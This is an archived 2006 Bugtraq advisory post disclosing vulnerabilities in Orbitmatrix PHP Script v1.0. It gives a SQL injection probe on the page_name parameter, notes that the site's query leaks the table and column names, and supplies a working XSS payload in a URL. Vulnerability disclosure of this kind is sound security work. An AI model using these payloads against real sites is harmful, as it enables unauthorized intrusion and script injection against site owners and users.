| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <20060713101415.27496.qmail@securityfocus.com>
Date: 13 Jul 2006 10:14:15 -0000
From: luny@...fucktard.com
To: bugtraq@...urityfocus.com
Subject: Orbitmatrix PHP Script v1.0
Orbitmatrix PHP Script v1.0
Homepage:
http://www.orbitcoders.com/
Affected files:
index.php
Possible SQL injection?:
http://www.example.com/index.php?page_name='
And by trying a XSS vuln as shown below on page_name we see the query below which is displayed on screen:
http://www.example.com/index.php?page_name=contact<script>
And the displayed query:
Query: select code from pages where name=contact
Now we know the tables name is pages and a row is name.
This works on all variable values.
As the above XSS vuln wont work, we can see that using the one below will:
http://www.example.com/index.php?page_name=<IMG%20SRC=javascript:alert('XSS')>